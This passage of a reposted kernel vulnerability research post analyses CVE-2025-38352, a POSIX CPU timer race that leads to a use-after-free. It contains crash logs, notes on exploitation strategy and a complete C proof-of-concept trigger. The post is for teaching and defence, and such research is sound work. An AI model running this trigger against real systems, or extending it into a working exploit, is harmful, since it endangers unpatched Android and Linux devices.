[   10.007503]  ? posix_timer_queue_signal+0x16a/0x1a0
[   10.007506]  kasan_report+0xaf/0xe0
[   10.007509]  ? posix_timer_queue_signal+0x16a/0x1a0
[   10.007512]  posix_timer_queue_signal+0x16a/0x1a0
[   10.007515]  cpu_timer_fire+0x8d/0x190
[   10.007518]  run_posix_cpu_timers+0x807/0x1840

Non-KASAN Splat

With KASAN disabled, a WARN_ON_ONCE inside send_sigqueue() is observed:

[   29.647984] ------------[ cut here ]------------
[   29.650267] WARNING: CPU: 2 PID: 205 at kernel/signal.c:1974 send_sigqueue+0x1be/0x250
[   29.653905] Modules linked in:
[   29.655484] CPU: 2 UID: 0 PID: 205 Comm: SLOWME Not tainted 6.12.33 #5
[   29.658569] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[   29.662579] RIP: 0010:send_sigqueue+0x1be/0x250
[   29.664712] Code: 44 89 e0 5b 5d 41 5c 41 5d 41 5e 41 5f e9 d5 e9 94 01 41 bc ff ff ff ff eb e2 48 8b 85 b0 07 00 00 48 8d 50 40 e9 2a ff ff ff <0f> 0b 45 31 e4 eb cb 0f 0b eb c7 4c 89 fe e8 bf 47 6a 01 48 8b bd
// [ ... ] Register states snipped out
[   29.703210] Call Trace:
[   29.704498]  <IRQ>
[   29.705663]  posix_timer_queue_signal+0x3f/0x50
[   29.707869]  cpu_timer_fire+0x23/0x70
[   29.709572]  run_posix_cpu_timers+0x2bc/0x5e0
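A Short Note on `CONFIG_POSIX_CPU_TIMERS_TASK_WORK`

@streypaws's blog post mentions that the vulnerability can be hit even with CONFIG_POSIX_CPU_TIMERS_TASK_WORK enabled, but I was not able to reproduce that result.

In fact, looking at how exit_task_work() behaves in do_exit() makes it clear why the bug cannot be triggered when CONFIG_POSIX_CPU_TIMERS_TASK_WORK is enabled:

- exit_task_work() calls task_work_run().
- task_work_run() "poisons" the task->task_works structure, which prevents any new work from being queued on it afterwards.

The vulnerability requires exit_notify() to be called before handle_posix_cpu_timers(). However, exit_task_work() (which calls handle_posix_cpu_timers() if that work has been queued) runs before exit_notify(), so the bug cannot be triggered when CONFIG_POSIX_CPU_TIMERS_TASK_WORK is enabled.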
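The "poisoning" behavior can be illustrated with a small user-space model. Everything below is a toy with hypothetical names. It only mirrors the idea, as I understand it from kernel/task_work.c, that the final task_work_run() of an exiting task leaves a sentinel in task->task_works and that a later task_work_add() sees the sentinel and fails with -ESRCH.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

/* Toy stand-ins for the kernel's callback_head and task_struct. */
struct toy_work { struct toy_work *next; };
struct toy_task { struct toy_work *task_works; };

/* Sentinel playing the role of the kernel's `work_exited` marker. */
static struct toy_work toy_work_exited;

/* Queue `w` on the task; fails once the task has been poisoned. */
int toy_task_work_add(struct toy_task *t, struct toy_work *w)
{
    assert(t != NULL && w != NULL);
    if (t->task_works == &toy_work_exited)
        return -ESRCH;
    w->next = t->task_works;
    t->task_works = w;
    return 0;
}

/*
 * Run (here: just count) all queued work items. When `exiting` is
 * non-zero the list head is replaced with the sentinel, as happens on
 * the exit_task_work() path. Returns the number of items processed.
 */
int toy_task_work_run(struct toy_task *t, int exiting)
{
    struct toy_work *w = t->task_works;
    int ran = 0;

    t->task_works = exiting ? &toy_work_exited : NULL;

    while (w != NULL && w != &toy_work_exited) {
        w = w->next;
        ran++;
    }
    return ran;
}
```

In this model, any timer work queued after the exiting run is rejected, so by the time exit_notify() would mark the task as a zombie there is no path left that reaches handle_posix_cpu_timers() through task work.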

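Exploitation

I am not sure whether I will spend time writing an exploit for this bug, but I noted down the following points:

- POSIX CPU timers are allocated from their own dedicated kmem_cache.
- struct k_itimer is not a complicated structure, so cross-cache will most likely be needed.
- To pull off cross-cache, the race window inside handle_posix_cpu_timers() may need to be extended.
- Extending the race window could be tricky, because handle_posix_cpu_timers() runs in scheduler tick interrupt context, where IRQs are disabled.

My PoC already provides a UAF primitive, and judging by the description in the Android bulletin the bug is clearly exploitable. What remains is solving the exploit engineering problems above.

If I do end up investing time in exploitation, I will write a new blog post as an update to this one! 😄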

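Conclusion

As I have mentioned in previous blog posts, my view is that analyzing complex vulnerabilities and writing PoCs for them is the best way to learn and to do vulnerability research.

In this case, I learned not only about POSIX CPU timers but also about how timers work in general, and about how the Linux kernel describes processes and threads through task structures.

If you have any questions, feel free to reach out to me on Twitter or through any other channel!

Final PoC

The final PoC is uploaded to my GitHub. Here is the link:

https://github.com/farazsth98/poc-CVE-2025-38352

It is also shown below: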

#define _GNU_SOURCE
#include <time.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <stdlib.h>
#include <err.h>
#include <sys/prctl.h>
#include <sched.h>
#include <linux/membarrier.h>
#include <sys/syscall.h>

// Exit with an error message if a syscall-style call returns -1
#define SYSCHK(x) ({                \
    typeof(x) __res = (x);          \
    if (__res == (typeof(x))-1)     \
        err(1, "SYSCHK(" #x ")");   \
    __res;                          \
})

// Pin the calling thread to CPU `i`
void pin_on_cpu(int i) {
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(i, &mask);
    sched_setaffinity(0, sizeof(mask), &mask);
}

// Notification callback; with SIGEV_THREAD it runs in a helper thread
void timer_fire(union sigval sv) {
    (void)sv;
    prctl(PR_SET_NAME, "TIMER_FIRED");
    printf("Timer fired\n");
}

// Give the kernel a chance to complete the RCU free of the timer
void wait_for_rcu(void) {
    syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0);
}

pthread_barrier_t barrier;
timer_t timer;
pthread_t reapee_thread;
int c2p[2]; // child to parent
int p2c[2]; // parent to child
long int wait_time = 250000;

void *reapee(void *arg) {
    (void)arg;
    pin_on_cpu(2);
    struct sigevent sev = {0};
    sev.sigev_notify = SIGEV_THREAD;
    sev.sigev_notify_function = timer_fire;

    prctl(PR_SET_NAME, "SLOWME");

    // Send this thread's TID to the parent process
    pid_t tid = (pid_t)syscall(SYS_gettid);
    SYSCHK(write(c2p[1], &tid, sizeof(pid_t)));

    printf("Creating timer\n");
    SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &timer));
    printf("Timer created\n");

    struct itimerspec ts = {
        .it_interval = {0, 0},
        .it_value = {
            .tv_sec = 0,
            .tv_nsec = wait_time, // Custom wait time
        },
    };

    // Wait for parent to attach
    pthread_barrier_wait(&barrier);

    SYSCHK(timer_settime(timer, 0, &ts, NULL));

    // Use some CPU time to make sure the timer will fire correctly.
    // `volatile` keeps the compiler from optimizing the loop away.
    for (volatile int i = 0; i < 1000000; i++);

    return NULL;
}

int main(int argc, char *argv[]) {
    // Use a custom wait time to figure out the exact timing when the
    // timer will fire right after `exit_notify()` sets the task's
    // state to EXIT_ZOMBIE.
    if (argc > 1) {
        wait_time = strtol(argv[1], NULL, 10);
        printf("Custom wait time: %ld\n", wait_time);
    }
    // Parent and child setup
    // Use pipes to communicate between parent and child
    SYSCHK(pipe(c2p));
    SYSCHK(pipe(p2c));

    pid_t pid = SYSCHK(fork());

    if (pid) {
        // parent
        pin_on_cpu(1);
        char m = 0;
        close(c2p[1]);
        close(p2c[0]);

        // Receive child process's REAPEE thread's TID
        pid_t tid;
        SYSCHK(read(c2p[0], &tid, sizeof(pid_t)));
        printf("Parent: reapee thread ID: %d\n", tid);

        // Attach and continue
        printf("Parent: attaching to REAPEE thread\n");
        SYSCHK(ptrace(PTRACE_ATTACH, tid, NULL, NULL));
        SYSCHK(waitpid(tid, NULL, __WALL));
        SYSCHK(ptrace(PTRACE_CONT, tid, NULL, NULL));

        // Signal to child that we attached and continued
        SYSCHK(write(p2c[1], &m, 1));

        // Reap the REAPEE thread now
        printf("Parent: reaping REAPEE thread\n");
        SYSCHK(waitpid(tid, NULL, __WALL));
        printf("Parent: detached from REAPEE\n");

        // Let the child process know REAPEE is reaped
        SYSCHK(write(p2c[1], &m, 1));

        // Let the child process delete and free the timer
        // before exiting
        SYSCHK(read(c2p[0], &m, 1));
    } else {
        // child
        pin_on_cpu(0);
        char m;
        close(c2p[0]);
        close(p2c[1]);

        prctl(PR_SET_NAME, "CHILD_MAIN");
        pthread_barrier_init(&barrier, NULL, 2);
        pthread_create(&reapee_thread, NULL, reapee, NULL);

        printf("Thread created\n");

        // Parent process writes to us when attached and continued, use
        // a barrier to continue the REAPEE thread now
        SYSCHK(read(p2c[0], &m, 1));
        pthread_barrier_wait(&barrier);

        // Parent process writes to us when waitpid() returns successfully.
        //
        // At this point, if we won the race, `handle_posix_cpu_timers()` will be in
        // the patched `mdelay(500)` with `tsk->exit_state != 0`, and calling
        // `timer_delete()` should make it see a NULL `sighand`, which will cause it to
        // just free the timer unconditionally.
        SYSCHK(read(p2c[0], &m, 1));
        timer_delete(timer);
        printf("Child: timer deleted\n");

        // Let the timer be freed by RCU, then let the parent process know it can exit
        wait_for_rcu();
        SYSCHK(write(c2p[1], &m, 1));
        pause();
    }
}

CVE-2025-38352 (Part 1) – In-the-wild Android Kernel Vulnerability Analysis + PoC

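Disclaimer: This blog post is for educational and research purposes only. All techniques and code samples provided are intended to help defenders understand attack methods and improve their security posture. Do not use this information to access or interfere with systems that you do not own or do not have explicit permission to test. Unauthorized use may violate laws and ethical guidelines. The author accepts no responsibility for any misuse or damage resulting from applying the concepts discussed.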


Reposted from securitainment: Faraz, "CVE-2025-38352 Part 1: Analysis and PoC of an Android Kernel Race-Condition UAF Exploited in the Wild"